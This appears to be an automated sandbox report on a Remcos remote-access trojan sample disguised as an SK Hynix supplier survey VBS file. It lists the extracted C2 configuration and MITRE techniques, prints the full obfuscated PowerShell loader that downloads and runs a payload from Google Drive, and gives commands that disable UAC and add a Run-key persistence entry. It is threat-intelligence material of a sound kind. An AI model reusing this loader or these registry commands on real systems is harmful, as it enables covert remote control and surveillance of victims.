remcos | ce47d649ae973ea63f08e678367e58a90fdda8304e1ca930b232dcb1ea29784e

General

Target

[SK하이닉스 ] 2024년 하반기 협력사 예비조사표.vbs
Size

15KB
MD5

ecdc2bdc4b6797e46ba636a37e9f4dc9
SHA1

46c1326fcad9f2081169a8e204108d9987d3140b
SHA256

aa39f9573531ad0822df9283582e801e104119339b4bc9553feac79f4c9da435
SHA512

323da981a911a54bfeb56e76a0cd8899c74dbce07682f381f9ea3974b8f5c1a2a3c4563feabf67085da5317b69216e3beefad16b7cb1b357eae46f6faaf399ed
SSDEEP

384:8aEIukP7IsT0LanTOfEia9SLFrA3BY99uN7yrkC:BBTIsguTOfi9SRrIY3ubC

Score

10^/10

remcos remotehost discovery evasion execution persistence rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

xmrhgsptl.ddns.net:47392

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-84A707
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 8 IoCs

flow	pid	Process
2	3976	WScript.exe
6	1456	powershell.exe
9	1456	powershell.exe
33	5020	msiexec.exe
37	5020	msiexec.exe
41	5020	msiexec.exe
43	5020	msiexec.exe
44	5020	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\\Software\\Frondescent48\\').servoed;%Doubtably% ($Normalstrrelsernes)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1456	powershell.exe
1144	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
6	drive.google.com
33	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
5020	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1144	powershell.exe
5020	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4872	reg.exe
4772	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1456	powershell.exe
1456	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1144	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5020	msiexec.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 1456	3976	WScript.exe	84
PID 3976 wrote to memory of 1456	3976	WScript.exe	84
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 5020 wrote to memory of 4084	5020	msiexec.exe	99
PID 5020 wrote to memory of 4084	5020	msiexec.exe	99
PID 5020 wrote to memory of 4084	5020	msiexec.exe	99
PID 4084 wrote to memory of 4872	4084	cmd.exe	101
PID 4084 wrote to memory of 4872	4084	cmd.exe	101
PID 4084 wrote to memory of 4872	4084	cmd.exe	101
PID 5020 wrote to memory of 876	5020	msiexec.exe	103
PID 5020 wrote to memory of 876	5020	msiexec.exe	103
PID 5020 wrote to memory of 876	5020	msiexec.exe	103
PID 876 wrote to memory of 4772	876	cmd.exe	105
PID 876 wrote to memory of 4772	876	cmd.exe	105
PID 876 wrote to memory of 4772	876	cmd.exe	105

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\[SK하이닉스 ] 2024년 하반기 협력사 예비조사표.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Registrerapparaters Vildtreservatets Untrue Yderbanes Tamaraus Rislendes #><#Rygskstativ Fiskeskippere Uanmodedes #>$Udvisningsordren='Forskningsledere';function Bjergvrks($Gamblerne){If ($host.DebuggerEnabled) {$Brsspekulationen=4} for ($Latinamerikaneres=$Brsspekulationen;;$Latinamerikaneres+=5){if(!$Gamblerne[$Latinamerikaneres]) { break }$Paraderer+=$Gamblerne[$Latinamerikaneres]}$Paraderer}function Leukosens($Latinamerikaneresiasa){ .($Klbemrke) ($Latinamerikaneresiasa)}$Skogbolite=Bjergvrks 'ElecnGejseBracT Veg. atcWHaemESkrmbStorCLubrL aabi SpueNonoN icat';$Regerer191=Bjergvrks ' AfvMSej o ParzJy li VarlNectl G aaTrau/';$Skriftsted124=Bjergvrks 'SuppT InflVanssSam 1B li2';$kontantprisernes=' Tu,[BussN.tcheSqu,tRefl.Ex.osv,reepuncrUnyivMblei DinCCoune un p,vadoPeruiBen,Nesc TAntim eraDukkNDentAAsphg JorETildrbr.v]fo,h:Lewd:SangsTotaEPletcRetsuEgepR PegIIg aTUnbiyRyn,PP ucr ForoPopiT AmoOSycoc RarOAvoiLToil=Svan$ TroSHistkBlovR I oI ollFHarbTElves rd.tLukrEFlj,d rd1Raa 2 ,en4';$Regerer191+=Bjergvrks 'cure5 Tor.Tils0 An. I,lu(EncoWPeleiRaj nMuskdV.dlo,istw trsUd.s QuanN ExuTMic Paro1Dis 0Oplr.Frat0Bovo;guld BerrWSagnihjrenSi k6 Ud 4 urn;Just PearxPref6Frem4henv; mme PandrP mav,ord: L s1Vare3Kuwa1U as.Okse0 C,u) H,v drG.ommeZooscRefok SjioSarg/Be o2Welk0 Lik1Grae0Hard0A ol1star0 ull1ac n FooF estiNoncr.vereKabafMilloOrdrxFo l/Mat 1Outs3Bran1 Tan.R.ce0';$Denazification=Bjergvrks 'AngluResesSubrENoncrAnbe-AnneAhirgGBymiEOxfoNGutsT';$Aureously=Bjergvrks ' Kldh R ttOmb.t Su,pMartsMeni:Spee/Pala/NikodFolkr Mo iBegrv.araeLrer.,orngRaptoVgteo T.ig acrl U geDist.Uvorc ,neoLozemAnim/CenouOvercSubd?FolkeAnomxKastp HoroTt.irN bet Rek=ElepdBes oIsolw.ursn UnglBe soj.leaMo,ndKoll&K,eriAlv dOrni=Bilm1Naut7 ArahdeciiUrceuOverlNedkZPjalx konJPl.s-Vandx tmovAgonaSmkkyShriY Te WSurpQA.kiQ omcR,ddh BajBNeurQ utcYVk,ewExostTimeGSe vcUdg.KD.bbF AutyTypev N dIT isV';$Katalepsi=Bjergvrks 'Folk>';$Klbemrke=Bjergvrks 'UndeiSatiENaphX';$Rektangelet='underholdshjlp';$Callas='\Dreamers.Lan';Leukosens (Bjergvrks 'Empr$KopiGs,ndlCa.poAfdeBTenoaNe vLMisf:,oryhBleuah stPScletHenrEWaggr UnleTr c2Jirk0 Rud6 Bu =Roma$FlacEPhosN ModvUtaa:FlasARai p,runpLangDSeraA IrrtSlotA Inc+satr$Qua CRep A .orLfourLudkoA HogS');Leukosens (Bjergvrks ' Ulm$WeargMeteLOp ro Pr bPro.ANumbLH gg: Mons Sk itilkK StnKGor E GodRPicohTaiseDisoDDigeSR,tsGIrvir iofa.eridD abeEj rnSvovsde t=Acti$KntraMedkUAadsRVolleGramO ArvuSk,bS nwlBookYV nl.EgocsUr kPR koLKmp I NebtFibr(flet$Chaok ,oraF igT UniaB reLCigaEFeltPOsmoSStnkI Top)');Leukosens (Bjergvrks $kontantprisernes);$Aureously=$Sikkerhedsgradens[0];$Popularizer=(Bjergvrks 'D bd$UnergWagoLUdplod gdbKa oASm lLResb:DextE AttkOutwSAntikTim L Dicu FlisCaliiMjeaVB,llITydeTUndrEAfs TImagEGl sNSe i=Subcn UncE ndew Ell-AdeloLuckb SpiJ TjrE PyecGipstSkep FdeSSmutY FlaSBipotPhyteSkygM Kic.Ifal$ k.rsbndekClawO R cG TilbPol OBillLStnkiF,rhT yoee');Leukosens ($Popularizer);Leukosens (Bjergvrks 'Ratt$Ope E,onfkAcros,ntukT.anlSpinuXenosP shiSacrvM thiEpittGrateModette reSqu nVari.DecoH iseStuda S.odAfhne udlrPirasDan [Jigg$ Rd DPho eT,nkn CytaI htzSp eiTalkfUndeiSeencBopla SjltBra isteeoD cenG mn]Mask=Proc$cereRE saeLissg aleDoggrBungeTu arCatt1Dela9Co c1');$Tripelalliancens=Bjergvrks 'Havg$I laEPizzk PyosAt ekAbatlUdvauJ,wpspolyiskulvOrgaiSt.wtS ore C rtRelae tan nco.BelaD MikoOprewG oun PiqlHen o E aa Pi.dPremFSasii DislFangeBars(Misq$Fo fACulduSpgerSnneeinsuoAfspuMegasvugglMiliyToxi, nt$FugiMCephaCompr EtekKalde Vibt T kpInf lPsalaRosecAutoevkst)';$Marketplace=$Haptere206;Leukosens (Bjergvrks ' dfa$TrreGMiaoljok,o atobL tkaSttylMono:.tvbpSu,cRGynaECentSMa rEMod,RReptvSupeaunmaTpolao ,arRArt.YSypi=Mi f(StavT EfreEjersHexotOct -FiskpmultARep,t yraH,dde ly e$ElevMMercAFa.mRKlimKFe.te EnftCocap PtoL ChiaAfmaC Pe E lat)');while (!$Preservatory) {Leukosens (Bjergvrks 'Patr$ Preg Skilaffao B lbE glaWanilflis:pompBVensaadopaSnigd OvosNonrm H raKip,nSnardG ves Ty pAdmiiRakebnonoeReacrQuars gte= Li $CiviBc.esrProfoRedatFesthCrayeObterB tyeSphid') ;Leukosens $Tripelalliancens;Leukosens (Bjergvrks 'PolysRepaT veraM sdrdrflt Lap-DeemspoldlaareELillE RhePPati f,rc4');Leukosens (Bjergvrks 'Aand$Tabeg ejelPuzzoLandbRaadADriflBio,:K,igpElsaRSuboE ArgsC ndEBeslrSch VPar A MantMo.poUnspR Gy.YArch=.top( hinTspawe ModsHandtF.rs-FortpPo aA spT U.oHU be D ng$ Mesm L,nA gneRSognKRaadEPhonT Un.pMonoLRetoa etocS.ukEF rd)') ;Leukosens (Bjergvrks 'Temp$Soa.GAnthl F noAfrebMosaAmrkelRepr:Oph BPlebrShotnEvaleExc l Nato ,hrkBestK,onse onrLande Bet= Una$YawpGTempL.caloBasebSankAkon lbeor:LegaS rbeuUnlinstr dSubchUndeee codDeflsPhthPKooroFrusL eptILoxitVin.iN tuSPsycKSlot+Spal+ ,ve%Demy$AutosPraeIForkKSndaKAk uEPourrLivsHAf aeHo,kdScarSZeisgBradrbimea apod Skae repNgangSUnri. IndcI,inoConnu D.snfor T') ;$Aureously=$Sikkerhedsgradens[$Brnelokkere]}$Otiant24=284090;$Bouillonen=30480;Leukosens (Bjergvrks 'Roco$E cagP ralFranoForuBKlasA ,diLC mi:StiveSpe ADvehr BlatD sshHi diAleuN P.aEVitasYeniS Pol .omb= Pre FastGMuseEQua t adb-BegrCOrohOvverndrmmTAutoE Sk.nF.ertLi.e Moms$PsycM SheaLamprDet KGadeeSemiTMe.aPBalaLNonaaflowCGuide');Leukosens (Bjergvrks 'Wors$Sulpg SinlCeliojerkbBar.aUranlpriv:pancSSisstStyleBrinnOversAfl tShivoSiber B,tmC vi Ae,=Appe Squ[Tu,mSDispyHys.s Alet KraePorkm.bdi.FremCsy soDehonLednvS eke AflrD mitgenn]Katt:Regn: Bi FDeiprKontoKemim MarBGuldaTrads asseball6Bred4M noS armt RedrFjeliNoncnDuf gunte(Anal$ IstE an aSmidrMud tKalkh SeniBaccn emte HersVitis.ire)');Leukosens (Bjergvrks 'Vari$ dlG UnclMewlo ilfBStddAextrLSe d:TentEKo,ogBlace DistS.miFUpsmOCanuRBoksbS ndRMinduJ vigSata Gobo=Depo Udpo[TrilSWhisYudposfluaT SkaEBrugMNonn. UdmtP beeBlunX KorTOpla.ErobE BabNauthCKe.lO pytdSydyiR.senLndeG ele]Send:Fejl:Em,cAUf rSAgerCbnhrISrgeiFrem.CannGFauseTussTNervsDeceT RebR Maxi H ln BurgNeur( es$MarjS nasT WooeAtteNDrbtSRetsT argo.torrCobbMScu )');Leukosens (Bjergvrks ' ud,$Ved GUndelForuoStnkBSlj AHardLBour:,ndkKFarlOPhiamContpKageoTektNOpsle ma.NGenitBechA Un,nWushaDummlBelfyAksiSStenE.ator esnUbeteAmyx=Bopl$RanueVerdg EmbeSpuftSemifFascO Itar An B onRCoinuBuf g Cys. BilsVilkU SchB obsSlettTeo r Laai ypoN etrgMat (W od$ZariOGypst RepIA paAUnatNRn,eTEn,o2Ha.n4,ont,Matr$ G,aBDudlo MinuMur IUndeLOv.rlUdr O.cytn Ca.e BenNsvej)');Leukosens $Komponentanalyserne;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Registrerapparaters Vildtreservatets Untrue Yderbanes Tamaraus Rislendes #><#Rygskstativ Fiskeskippere Uanmodedes #>$Udvisningsordren='Forskningsledere';function Bjergvrks($Gamblerne){If ($host.DebuggerEnabled) {$Brsspekulationen=4} for ($Latinamerikaneres=$Brsspekulationen;;$Latinamerikaneres+=5){if(!$Gamblerne[$Latinamerikaneres]) { break }$Paraderer+=$Gamblerne[$Latinamerikaneres]}$Paraderer}function Leukosens($Latinamerikaneresiasa){ .($Klbemrke) ($Latinamerikaneresiasa)}$Skogbolite=Bjergvrks 'ElecnGejseBracT Veg. atcWHaemESkrmbStorCLubrL aabi SpueNonoN icat';$Regerer191=Bjergvrks ' AfvMSej o ParzJy li VarlNectl G aaTrau/';$Skriftsted124=Bjergvrks 'SuppT InflVanssSam 1B li2';$kontantprisernes=' Tu,[BussN.tcheSqu,tRefl.Ex.osv,reepuncrUnyivMblei DinCCoune un p,vadoPeruiBen,Nesc TAntim eraDukkNDentAAsphg JorETildrbr.v]fo,h:Lewd:SangsTotaEPletcRetsuEgepR PegIIg aTUnbiyRyn,PP ucr ForoPopiT AmoOSycoc RarOAvoiLToil=Svan$ TroSHistkBlovR I oI ollFHarbTElves rd.tLukrEFlj,d rd1Raa 2 ,en4';$Regerer191+=Bjergvrks 'cure5 Tor.Tils0 An. I,lu(EncoWPeleiRaj nMuskdV.dlo,istw trsUd.s QuanN ExuTMic Paro1Dis 0Oplr.Frat0Bovo;guld BerrWSagnihjrenSi k6 Ud 4 urn;Just PearxPref6Frem4henv; mme PandrP mav,ord: L s1Vare3Kuwa1U as.Okse0 C,u) H,v drG.ommeZooscRefok SjioSarg/Be o2Welk0 Lik1Grae0Hard0A ol1star0 ull1ac n FooF estiNoncr.vereKabafMilloOrdrxFo l/Mat 1Outs3Bran1 Tan.R.ce0';$Denazification=Bjergvrks 'AngluResesSubrENoncrAnbe-AnneAhirgGBymiEOxfoNGutsT';$Aureously=Bjergvrks ' Kldh R ttOmb.t Su,pMartsMeni:Spee/Pala/NikodFolkr Mo iBegrv.araeLrer.,orngRaptoVgteo T.ig acrl U geDist.Uvorc ,neoLozemAnim/CenouOvercSubd?FolkeAnomxKastp HoroTt.irN bet Rek=ElepdBes oIsolw.ursn UnglBe soj.leaMo,ndKoll&K,eriAlv dOrni=Bilm1Naut7 ArahdeciiUrceuOverlNedkZPjalx konJPl.s-Vandx tmovAgonaSmkkyShriY Te WSurpQA.kiQ omcR,ddh BajBNeurQ utcYVk,ewExostTimeGSe vcUdg.KD.bbF AutyTypev N dIT isV';$Katalepsi=Bjergvrks 'Folk>';$Klbemrke=Bjergvrks 'UndeiSatiENaphX';$Rektangelet='underholdshjlp';$Callas='\Dreamers.Lan';Leukosens (Bjergvrks 'Empr$KopiGs,ndlCa.poAfdeBTenoaNe vLMisf:,oryhBleuah stPScletHenrEWaggr UnleTr c2Jirk0 Rud6 Bu =Roma$FlacEPhosN ModvUtaa:FlasARai p,runpLangDSeraA IrrtSlotA Inc+satr$Qua CRep A .orLfourLudkoA HogS');Leukosens (Bjergvrks ' Ulm$WeargMeteLOp ro Pr bPro.ANumbLH gg: Mons Sk itilkK StnKGor E GodRPicohTaiseDisoDDigeSR,tsGIrvir iofa.eridD abeEj rnSvovsde t=Acti$KntraMedkUAadsRVolleGramO ArvuSk,bS nwlBookYV nl.EgocsUr kPR koLKmp I NebtFibr(flet$Chaok ,oraF igT UniaB reLCigaEFeltPOsmoSStnkI Top)');Leukosens (Bjergvrks $kontantprisernes);$Aureously=$Sikkerhedsgradens[0];$Popularizer=(Bjergvrks 'D bd$UnergWagoLUdplod gdbKa oASm lLResb:DextE AttkOutwSAntikTim L Dicu FlisCaliiMjeaVB,llITydeTUndrEAfs TImagEGl sNSe i=Subcn UncE ndew Ell-AdeloLuckb SpiJ TjrE PyecGipstSkep FdeSSmutY FlaSBipotPhyteSkygM Kic.Ifal$ k.rsbndekClawO R cG TilbPol OBillLStnkiF,rhT yoee');Leukosens ($Popularizer);Leukosens (Bjergvrks 'Ratt$Ope E,onfkAcros,ntukT.anlSpinuXenosP shiSacrvM thiEpittGrateModette reSqu nVari.DecoH iseStuda S.odAfhne udlrPirasDan [Jigg$ Rd DPho eT,nkn CytaI htzSp eiTalkfUndeiSeencBopla SjltBra isteeoD cenG mn]Mask=Proc$cereRE saeLissg aleDoggrBungeTu arCatt1Dela9Co c1');$Tripelalliancens=Bjergvrks 'Havg$I laEPizzk PyosAt ekAbatlUdvauJ,wpspolyiskulvOrgaiSt.wtS ore C rtRelae tan nco.BelaD MikoOprewG oun PiqlHen o E aa Pi.dPremFSasii DislFangeBars(Misq$Fo fACulduSpgerSnneeinsuoAfspuMegasvugglMiliyToxi, nt$FugiMCephaCompr EtekKalde Vibt T kpInf lPsalaRosecAutoevkst)';$Marketplace=$Haptere206;Leukosens (Bjergvrks ' dfa$TrreGMiaoljok,o atobL tkaSttylMono:.tvbpSu,cRGynaECentSMa rEMod,RReptvSupeaunmaTpolao ,arRArt.YSypi=Mi f(StavT EfreEjersHexotOct -FiskpmultARep,t yraH,dde ly e$ElevMMercAFa.mRKlimKFe.te EnftCocap PtoL ChiaAfmaC Pe E lat)');while (!$Preservatory) {Leukosens (Bjergvrks 'Patr$ Preg Skilaffao B lbE glaWanilflis:pompBVensaadopaSnigd OvosNonrm H raKip,nSnardG ves Ty pAdmiiRakebnonoeReacrQuars gte= Li $CiviBc.esrProfoRedatFesthCrayeObterB tyeSphid') ;Leukosens $Tripelalliancens;Leukosens (Bjergvrks 'PolysRepaT veraM sdrdrflt Lap-DeemspoldlaareELillE RhePPati f,rc4');Leukosens (Bjergvrks 'Aand$Tabeg ejelPuzzoLandbRaadADriflBio,:K,igpElsaRSuboE ArgsC ndEBeslrSch VPar A MantMo.poUnspR Gy.YArch=.top( hinTspawe ModsHandtF.rs-FortpPo aA spT U.oHU be D ng$ Mesm L,nA gneRSognKRaadEPhonT Un.pMonoLRetoa etocS.ukEF rd)') ;Leukosens (Bjergvrks 'Temp$Soa.GAnthl F noAfrebMosaAmrkelRepr:Oph BPlebrShotnEvaleExc l Nato ,hrkBestK,onse onrLande Bet= Una$YawpGTempL.caloBasebSankAkon lbeor:LegaS rbeuUnlinstr dSubchUndeee codDeflsPhthPKooroFrusL eptILoxitVin.iN tuSPsycKSlot+Spal+ ,ve%Demy$AutosPraeIForkKSndaKAk uEPourrLivsHAf aeHo,kdScarSZeisgBradrbimea apod Skae repNgangSUnri. IndcI,inoConnu D.snfor T') ;$Aureously=$Sikkerhedsgradens[$Brnelokkere]}$Otiant24=284090;$Bouillonen=30480;Leukosens (Bjergvrks 'Roco$E cagP ralFranoForuBKlasA ,diLC mi:StiveSpe ADvehr BlatD sshHi diAleuN P.aEVitasYeniS Pol .omb= Pre FastGMuseEQua t adb-BegrCOrohOvverndrmmTAutoE Sk.nF.ertLi.e Moms$PsycM SheaLamprDet KGadeeSemiTMe.aPBalaLNonaaflowCGuide');Leukosens (Bjergvrks 'Wors$Sulpg SinlCeliojerkbBar.aUranlpriv:pancSSisstStyleBrinnOversAfl tShivoSiber B,tmC vi Ae,=Appe Squ[Tu,mSDispyHys.s Alet KraePorkm.bdi.FremCsy soDehonLednvS eke AflrD mitgenn]Katt:Regn: Bi FDeiprKontoKemim MarBGuldaTrads asseball6Bred4M noS armt RedrFjeliNoncnDuf gunte(Anal$ IstE an aSmidrMud tKalkh SeniBaccn emte HersVitis.ire)');Leukosens (Bjergvrks 'Vari$ dlG UnclMewlo ilfBStddAextrLSe d:TentEKo,ogBlace DistS.miFUpsmOCanuRBoksbS ndRMinduJ vigSata Gobo=Depo Udpo[TrilSWhisYudposfluaT SkaEBrugMNonn. UdmtP beeBlunX KorTOpla.ErobE BabNauthCKe.lO pytdSydyiR.senLndeG ele]Send:Fejl:Em,cAUf rSAgerCbnhrISrgeiFrem.CannGFauseTussTNervsDeceT RebR Maxi H ln BurgNeur( es$MarjS nasT WooeAtteNDrbtSRetsT argo.torrCobbMScu )');Leukosens (Bjergvrks ' ud,$Ved GUndelForuoStnkBSlj AHardLBour:,ndkKFarlOPhiamContpKageoTektNOpsle ma.NGenitBechA Un,nWushaDummlBelfyAksiSStenE.ator esnUbeteAmyx=Bopl$RanueVerdg EmbeSpuftSemifFascO Itar An B onRCoinuBuf g Cys. BilsVilkU SchB obsSlettTeo r Laai ypoN etrgMat (W od$ZariOGypst RepIA paAUnatNRn,eTEn,o2Ha.n4,ont,Matr$ G,aBDudlo MinuMur IUndeLOv.rlUdr O.cytn Ca.e BenNsvej)');Leukosens $Komponentanalyserne;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1144
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\Software\Frondescent48\').servoed;%Doubtably% ($Normalstrrelsernes)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\Software\Frondescent48\').servoed;%Doubtably% ($Normalstrrelsernes)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4872
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:876
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

1

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
db04151e30c9233e9a273f8c49850b28

SHA1
45d54f393fa1468e2de5b0791ed426ad1a8b9fa7

SHA256
6c254f050a44c8517454d8714b4e8bd957aed5350afc871270a7322a790f7850

SHA512
c2c6c9da6ce7e5eb0df92779a9a2967af14b5c8c4fb3d6c8ccbedd54a57dc24fdb2872eb872378926861ef8b5fbfe3b7f29f17b31d6d9377962f6d99c7ea71cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9c58be6d98809a0ea5149c1ddf3982cc

SHA1
94b7b598571e93803ee068d7d8bb1051d11943de

SHA256
392b5d88a0b6db42b7a45328175a5fb34764f15152eaa0c72a1428d3e4eb2ff7

SHA512
c4606ea7ef50ae8e0d5328da3ad4927fb527793af9d8b5cda4108243a7c0acc8ff6f2686b3c383c42a5f27498e20c1e13b4fe2c1a75dd8938d58ab1b7e157a59

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z0nlust0.j5t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Dreamers.Lan

Filesize
409KB

MD5
e8e8f70630d0ed255ba5c4c8c8f93357

SHA1
7fd44450794ef2830c908f8ea0fe62759af9ed87

SHA256
ed5fe0a58461eccceabf20e95fe744b74f1455842b3ea325c1f7fa01e0649d0d

SHA512
45a3c10a2282a7d151afa5120ebff15f944fe492e7f51af93dcfc163f06c8f4bd8a4ed90b1ef6d1ca71310951690ed5e12b9175213c72eabf983bde3b3192cf1

Download Submit
memory/1144-46-0x00000000073C0000-0x00000000073E2000-memory.dmp

Filesize
136KB

Download
memory/1144-45-0x0000000007460000-0x00000000074F6000-memory.dmp

Filesize
600KB

Download
memory/1144-49-0x0000000008BD0000-0x000000000BDA3000-memory.dmp

Filesize
49.8MB

Download
memory/1144-47-0x0000000008620000-0x0000000008BC4000-memory.dmp

Filesize
5.6MB

Download
memory/1144-44-0x0000000006750000-0x000000000676A000-memory.dmp

Filesize
104KB

Download
memory/1144-25-0x0000000004C30000-0x0000000004C66000-memory.dmp

Filesize
216KB

Download
memory/1144-26-0x00000000052A0000-0x00000000058C8000-memory.dmp

Filesize
6.2MB

Download
memory/1144-27-0x0000000005900000-0x0000000005922000-memory.dmp

Filesize
136KB

Download
memory/1144-28-0x00000000059A0000-0x0000000005A06000-memory.dmp

Filesize
408KB

Download
